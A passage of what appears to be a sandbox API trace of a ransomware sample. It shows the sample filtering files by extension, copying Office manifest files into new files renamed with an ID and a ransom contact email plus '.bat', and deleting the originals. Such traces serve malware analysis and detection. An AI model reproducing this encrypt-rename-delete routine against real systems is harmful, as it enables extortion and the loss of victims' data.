(lpString1=".docx", lpString2="E.xml") returned -1 [0058.363] lstrlenW (lpString=".pdf") returned 4 [0058.363] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString=".xls") returned 4 [0058.363] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString=".xlsx") returned 5 [0058.363] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.363] lstrlenW (lpString=".ppt") returned 4 [0058.363] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.364] lstrlenW (lpString=".zip") returned 4 [0058.364] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.364] lstrlenW (lpString=".rar") returned 4 [0058.364] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.364] lstrlenW (lpString=".bz2") returned 4 [0058.364] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.364] lstrlenW (lpString=".7z") returned 3 [0058.364] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.364] lstrlenW (lpString=".dbf") returned 4 [0058.364] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.364] lstrlenW (lpString=".1cd") returned 4 [0058.364] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0058.364] lstrlenW (lpString=".jpg") returned 4 [0058.364] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.364] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.364] lstrlenW (lpString="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 53 [0058.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.374] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=253712) returned 1 [0058.374] CloseHandle (hObject=0x370) returned 1 [0058.374] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 0x220 [0058.374] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.374] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.374] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0058.375] GetLastError () returned 0x0 [0058.375] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x3df10, lpOverlapped=0x0) returned 1 [0058.403] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x3df20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x3df20, lpOverlapped=0x0) returned 1 [0058.407] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.407] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.407] SetEndOfFile (hFile=0x350) returned 1 [0058.407] CloseHandle (hObject=0x350) returned 1 [0058.412] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.412] SetEndOfFile (hFile=0x370) returned 1 [0058.414] CloseHandle (hObject=0x370) returned 1 [0058.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.414] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 1 [0058.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.415] lstrlenW (lpString=".doc") returned 4 [0058.415] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString=".docx") returned 5 [0058.415] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.415] lstrlenW (lpString=".pdf") returned 4 [0058.415] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString=".xls") returned 4 [0058.415] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString=".xlsx") returned 5 [0058.415] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.415] lstrlenW (lpString=".ppt") returned 4 [0058.415] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.415] lstrlenW (lpString=".zip") returned 4 [0058.415] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.415] lstrlenW (lpString=".rar") returned 4 [0058.415] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString=".bz2") returned 4 [0058.415] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString=".7z") returned 3 [0058.415] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.415] lstrlenW (lpString=".dbf") returned 4 [0058.415] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.415] lstrlenW (lpString=".1cd") returned 4 [0058.415] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString=".jpg") returned 4 [0058.416] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString=".doc") returned 4 [0058.416] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString=".docx") returned 5 [0058.416] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.416] lstrlenW (lpString=".pdf") returned 4 [0058.416] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString=".xls") returned 4 [0058.416] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString=".xlsx") returned 5 [0058.416] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.416] lstrlenW (lpString=".ppt") returned 4 [0058.416] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString=".zip") returned 4 [0058.416] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.416] lstrlenW (lpString=".rar") returned 4 [0058.416] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString=".bz2") returned 4 [0058.416] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString=".7z") returned 3 [0058.416] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString=".dbf") returned 4 [0058.416] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString=".1cd") returned 4 [0058.416] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0058.416] lstrlenW (lpString=".jpg") returned 4 [0058.416] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.417] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.417] lstrlenW (lpString="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 53 [0058.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.417] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=1124942) returned 1 [0058.417] CloseHandle (hObject=0x370) returned 1 [0058.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 0x220 [0058.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.417] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.417] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0058.418] GetLastError () returned 0x0 [0058.418] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0058.490] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0058.504] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x12a5e, lpOverlapped=0x0) returned 1 [0058.989] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x12a60, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x12a60, lpOverlapped=0x0) returned 1 [0058.993] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.993] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.993] SetEndOfFile (hFile=0x350) returned 1 [0058.993] CloseHandle (hObject=0x350) returned 1 [0059.013] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.013] SetEndOfFile (hFile=0x370) returned 1 [0059.015] CloseHandle (hObject=0x370) returned 1 [0059.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.015] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 1 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.015] lstrlenW (lpString=".doc") returned 4 [0059.015] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.015] lstrlenW (lpString=".docx") returned 5 [0059.015] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.015] lstrlenW (lpString=".pdf") returned 4 [0059.015] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.015] lstrlenW (lpString=".xls") returned 4 [0059.016] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString=".xlsx") returned 5 [0059.016] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.016] lstrlenW (lpString=".ppt") returned 4 [0059.016] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.016] lstrlenW (lpString=".zip") returned 4 [0059.016] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.016] lstrlenW (lpString=".rar") returned 4 [0059.016] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString=".bz2") returned 4 [0059.016] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString=".7z") returned 3 [0059.016] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.016] lstrlenW (lpString=".dbf") returned 4 [0059.016] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.016] lstrlenW (lpString=".1cd") returned 4 [0059.016] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.016] lstrlenW (lpString=".jpg") returned 4 [0059.016] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.016] lstrlenW (lpString=".doc") returned 4 [0059.016] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString=".docx") returned 5 [0059.016] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.016] lstrlenW (lpString=".pdf") returned 4 [0059.016] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString=".xls") returned 4 [0059.016] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.016] lstrlenW (lpString=".xlsx") returned 5 [0059.016] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.016] lstrlenW (lpString=".ppt") returned 4 [0059.017] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.017] lstrlenW (lpString=".zip") returned 4 [0059.017] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.017] lstrlenW (lpString=".rar") returned 4 [0059.017] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.017] lstrlenW (lpString=".bz2") returned 4 [0059.017] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.017] lstrlenW (lpString=".7z") returned 3 [0059.017] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.017] lstrlenW (lpString=".dbf") returned 4 [0059.017] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.017] lstrlenW (lpString=".1cd") returned 4 [0059.017] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0059.017] lstrlenW (lpString=".jpg") returned 4 [0059.017] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.017] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.017] lstrlenW (lpString="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 53 [0059.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.018] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=215883) returned 1 [0059.018] CloseHandle (hObject=0x370) returned 1 [0059.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.019] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.019] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.031] GetLastError () returned 0x0 [0059.031] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x34b4b, lpOverlapped=0x0) returned 1 [0059.061] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x34b50, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x34b50, lpOverlapped=0x0) returned 1 [0059.064] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.064] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.065] SetEndOfFile (hFile=0x344) returned 1 [0059.065] CloseHandle (hObject=0x344) returned 1 [0059.068] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.069] SetEndOfFile (hFile=0x370) returned 1 [0059.070] CloseHandle (hObject=0x370) returned 1 [0059.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 1 [0059.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.071] lstrlenW (lpString=".doc") returned 4 [0059.071] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.071] lstrlenW (lpString=".docx") returned 5 [0059.071] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.071] lstrlenW (lpString=".pdf") returned 4 [0059.071] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.071] lstrlenW (lpString=".xls") returned 4 [0059.072] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString=".xlsx") returned 5 [0059.072] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.072] lstrlenW (lpString=".ppt") returned 4 [0059.072] lstrcmpiW 